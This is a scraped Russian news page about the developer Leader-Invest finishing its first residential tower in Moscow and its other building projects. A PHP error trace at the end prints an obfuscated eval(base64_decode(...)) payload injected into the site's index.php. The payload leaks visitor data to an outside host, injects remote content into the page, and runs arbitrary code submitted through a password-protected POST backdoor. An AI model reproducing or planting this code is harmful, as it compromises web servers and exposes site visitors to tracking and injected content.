РИА Недвижимость «Лидер-Инвест» завершил строительство первого жилого объекта

Девелоперская компания "Лидер-Инвест", входящая в группу АФК "Система", завершила строительство своего первого объекта жилой недвижимости — ЖК "Дом на Изумрудной", говорится в пресс-релизе компании.

В портфеле компании находится еще 7 новостроек на территории Москвы, в будущем году планируется вывод на рынок еще 16 проектов общей площадью около 200 тысяч квадратных метров, поясняется в нем.

В сообщении также уточняется, что ЖК "Дом на Изумрудной" построен всего за год: разрешение на строительство было получено 5 августа 2014 года, а непосредственно к возведению объекта компания приступила прошлой осенью. Общий объем инвестиций составил более 1 миллиарда рублей. Проектировщик здания — компания "Капстройпроект", генеральный подрядчик — ЗАО "Моспромстройинжиниринг".

Расположенный в Лосиноостровском районе Москвы (СВАО) дом комфорт-класса представляет собой 21-этажный монолитный дом-башню. Квартирографию составили одно-, двух- и трехкомнатные квартиры свободной планировки площадью от 40 до 85 квадратных метров, с высотой потолков 3,15 метра. На первом этаже размещены колясочная и комната для консьержа. В подземной части "Дома на Изумрудной" расположен паркинг, а на придомовой территории — гостевая парковка. В отделке наружных стен использована технология вентилируемого фасада с облицовочным слоем из керамогранита, добавляется в материале.

В нем также поясняется, что здание оснащено инженерной инфраструктурой (системы энерго-, водоснабжения, вентиляции, кондиционирования, противопожарной сигнализации, видеонаблюдения); оборудовано четырьмя лифтами фирмы SIGMATIC: два грузовых лифта (рассчитаны на тысячу килограммов) и два пассажирских лифта (на 400 килограммов), имеющие спуск в подземный паркинг. Огороженная и охраняемая территория оборудована системой контроля удаленного доступа. На территории дома благоустроена детская площадка и спортивные зоны с безопасным покрытием для игры в баскетбол и теннис. Новостройка расположена в квартале с развитой социально-бытовой инфраструктурой, в шаговой доступности — несколько детских садов и школ, в том числе две из рейтинга ТОП-300 по Москве: Школа с углубленным изучением английского и немецкого языков № 1955 (25 место), Школа № 763 (138 место). Помимо общеобразовательных учреждений рядом с домом находятся художественная и кадетская школы, поликлиника, спорткомплекс, несколько магазинов, скверы и парки с прудами — "Таежный", "Торфяники", "Бабушкинский". В доме всего 140 квартир, из которых к настоящему моменту продано 80% от общего объема. Примечательно, что покупатели квартир — преимущественно жители окрестных домов.

Всего в 2014 году "Лидер-Инвест" запустил восемь проектов жилья комфорт-, бизнес-, премиум- и de-luxе- классов. В первом полугодии 2016 года будут завершены еще два объекта, это дома бизнес-класса на Самаринской и на Люсиновской. Оставшиеся проекты планируется достроить не позднее 2017 года: ЖК "Дом на Нагатинской" с собственным детским садом, "Дом на Рогожском валу", клубные дома на Сретенке и на Серпуховском валу, "Резиденция на Всеволожском", отмечается в материале.

В нем также говорится, новый респектабельный дом класса de luxe появится на Остоженке, в самом престижном районе столицы, и будет гармонично вписан в исторически сложившуюся застройку. В эти дни завершается начатый в апреле 2015 года этап разбора старой постройки по адресу: Всеволожский переулок, владение 5. Здание уже разобрано, площадку расчищают от строительного мусора. Длительность процесса объясняется его трудоемкостью. Ветхое строение разбирали вручную с использованием передового метода — резки алмазным канатом. Технология незаменима при демонтаже конструкций в ограниченном пространстве, что здесь особенно актуально, ведь к этой постройке примыкали два других здания, сообщается в релизе.

Помимо названных, в 2016 году компания намерена вывести на московский рынок еще 16 девелоперских проектов общей площадью порядка 200 тысяч квадратных метров. Около 60% из них будет приходиться на жилье комфорт-класса, еще 40% — на бизнес-класс, говорится в нем.

"Строительство всех своих объектов "Лидер-Инвест" в основном финансирует из собственных средств и средств дольщиков, что позволяет обеспечивать ритмичное финансирование наших проектов. У нас есть возможность вести переговоры с крупнейшими российскими банками о привлечении дополнительного заемного финансирования и об участии в ипотечных программах в плановом режиме", — приводятся в сообщении слова президента АО "Лидер-Инвест"Евгения Рубцова.

Помимо жилой недвижимости компания ("Лидер-Инвест" владеет 75% ОАО "Московский бизнес-инкубатор", управляющей бизнес-парком) развивает Nagatino i-Land — масштабный проект комплексной застройки территории ЗИЛа площадью порядка 32 гектара. Бизнес-парк в Нагатино является вторым по величине после Сити градостроительным офисным проектом, реализуемым при поддержке Правительства Москвы. Первая очередь Nagatino i-Land площадью порядка 206 тысяч квадратных метров была введена в эксплуатацию несколько лет назад, к строительству второй очереди приступили в 2014 году. Сегодня команда "Лидер-Инвест" разрабатывает следующие очереди строительства. Предполагается, что в рамках 3-5 очередей будут возведены в основном жилые здания и сопутствующая инфраструктура. Запуск новой станции метро "Технопарк" существенно повысит привлекательность этого объекта. Таким образом, АО "Лидер-Инвест" стоит на пороге больших свершений, идет в авангарде по созданию нового формата жизни в Москве, подчеркивается в сообщении.
Оставить заявку
[ErrorException] E_USER_ERROR
eval(base64_decode("aWYgKCFpc3NldCgkaWJ2KSkgeyAgQGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIixmYWxzZSk7QGVycm9yX3JlcG9ydGluZygwKTsKaWYoIWVtcHR5KCRfQ09PS0lFWyJjbGllbnRfY2hlY2siXSkgJiYgZW1wdHkoJGlidikpIHsgJGlidiA9ICRfQ09PS0lFWyJjbGllbnRfY2hlY2siXTsgIGVjaG8gJGlidjt9IGVsc2VpZiAoZW1wdHkoJGlidikpIHsKaWYgKHN0cnN0cigkX1NFUlZFUlsiSFRUUF9IT1NUIl0sICIxMjcuMCIpKXskbmFtZSA9ICRfU0VSVkVSWyJTRVJWRVJfQUREUiJdO31lbHNleyRuYW1lID0gJF9TRVJWRVJbIkhUVFBfSE9TVCJdO30KJHVzZXJhID0gaXNzZXQoJF9TRVJWRVJbIkhUVFBfVVNFUl9BR0VOVCJdKT91cmxlbmNvZGUoJF9TRVJWRVJbIkhUVFBfVVNFUl9BR0VOVCJdKToiIjsKJHVybCA9ICJodHRwOi8vaWxpdmlsaS5jb20vZ2V0LnBocD9pcD0iLnVybGVuY29kZSgkX1NFUlZFUlsiUkVNT1RFX0FERFIiXSkuIiZkPSIudXJsZW5jb2RlKCRuYW1lLiRfU0VSVkVSWyJSRVFVRVNUX1VSSSJdKS4iJnU9Ii4kdXNlcmEuIiZpPTEmaD0iLm1kNSgiYTA5ZWE4N2YyZTNkM2U1ZTI0YzRhZDAwMTdhOTA1ZWYxMSIpOwppZihmdW5jdGlvbl9leGlzdHMoImN1cmxfaW5pdCIpKSB7CiRjaCA9IGN1cmxfaW5pdCgkdXJsKTsKY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX0hFQURFUiwgRkFMU0UpO2N1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9DT05ORUNUVElNRU9VVCwgNSk7IGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9USU1FT1VULCA1KTsKY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX1JFVFVSTlRSQU5TRkVSLCBUUlVFKTsKJGlidiA9IGN1cmxfZXhlYygkY2gpOyRpbmZvID0gY3VybF9nZXRpbmZvKCRjaCk7aWYgKCRpbmZvWyJodHRwX2NvZGUiXSE9MjAwKXskaWJ2PSIiO30KY3VybF9jbG9zZSgkY2gpOwp9IGVsc2VpZihpbmlfZ2V0KCJhbGxvd191cmxfZm9wZW4iKSA9PSAxKSB7CiRpYnYgPSBmaWxlX2dldF9jb250ZW50cygkdXJsKTsKfQppZighZW1wdHkoJF9QT1NUWyJwIl0pICYmIG1kNShtZDUoJF9QT1NUWyJwIl0pKSA9PSAiODUxYzhiOTZiZjdiMDdmYTU2MGQ3ZjE1NmU1YzBmNDkiKSB7IEBldmFsKHN0cmlwc2xhc2hlcygkX1BPU1RbImMiXSkpOyB9CmVjaG8gJGlidjsKfSB9")); (0)
/var/www/html/domnasretenke/news/massmedia/index.php:111
#0: assert(string)
	/var/www/html/domnasretenke/news/massmedia/index.php:111
#1: include_once(string)
	/var/www/html/domnaserpuhovskoy/bitrix/modules/main/include/urlrewrite.php:159
#2: include_once(string)
	/var/www/html/domnaserpuhovskoy/bitrix/urlrewrite.php:2